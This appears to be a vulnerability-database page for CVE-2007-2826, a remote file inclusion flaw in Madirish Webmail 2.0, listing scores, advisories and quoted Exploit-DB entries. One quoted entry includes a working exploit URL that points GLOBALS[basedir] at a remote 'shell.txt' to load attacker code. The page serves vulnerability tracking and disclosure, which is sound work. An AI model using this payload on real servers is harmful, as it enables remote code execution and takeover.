CVE-2007-2826
published 2007-05-22CVE-2007-2826: PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the…
PriorityP345high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
3.26%
86.8th percentile
PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| madirish_webmail | madirish_webmail | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-hvjc-v463-hr2w: Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-3058 [HIGH] GHSA-hvjc-v463-hr2w: Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2
Multiple PHP remote file inclusion vulnerabilities in Madirish Webmail 2.0 allow remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter to (1) calendar.php, (2) compose.php, and (3) index.php, different vectors than CVE-2007-2826. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
GHSA
GHSA-rcgq-m943-xxx6: PHP remote file inclusion vulnerability in lib/addressbook
ghsa_unreviewed·2022-05-01
CVE-2007-2826 [HIGH] CWE-94 GHSA-rcgq-m943-xxx6: PHP remote file inclusion vulnerability in lib/addressbook
PHP remote file inclusion vulnerability in lib/addressbook.php in Madirish Webmail 2.0 allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[basedir] parameter.
No detection rules found.
Exploit-DB
Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion
exploitdb·2010-04-24
CVE-2007-2826 Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion
Madirish Webmail 2.01 - 'baseDir' Local/Remote File Inclusion
---
Madirish Webmail 2.01 (basedir) RFI/LFI Vulnerability
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################## 1
0 I'm eidelweiss member from Inj3ct0r Team 1
1 ######################################## 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Download: http://sourceforge.net/projects/madirishwebmail/files/madirish_webmail/2.01/Madirish_W
Exploit-DB
Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion
exploitdb·2007-06-04
CVE-2007-2826 Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion
Madirish Webmail 2.0 - 'addressbook.php' Remote File Inclusion
---
###########################################################
Madirish Webmail v2.0 Remote File Include Vulnerabilities
Author : BoZKuRTSeRDaR
Contact MSN:[email protected]
My Homepage :WwW.Turkmilliyetcileri.OrG
script Download : http://sourceforge.net/projects/madirishwebmail
###############################################################################
code:
require_once($GLOBALS['basedir']."lib/sql.php")
exploit:
http://www.example.com/[patch]lib/addressbook.php?GLOBALS[basedir]=shell.txt?
# milw0rm.com [2007-06-04]
No writeups or analysis indexed.
http://osvdb.org/36802http://secunia.com/advisories/25475http://securityreason.com/securityalert/2718http://www.securityfocus.com/bid/24059https://www.exploit-db.com/exploits/4031http://osvdb.org/36802http://secunia.com/advisories/25475http://securityreason.com/securityalert/2718http://www.securityfocus.com/bid/24059https://www.exploit-db.com/exploits/4031
2007-05-22
Published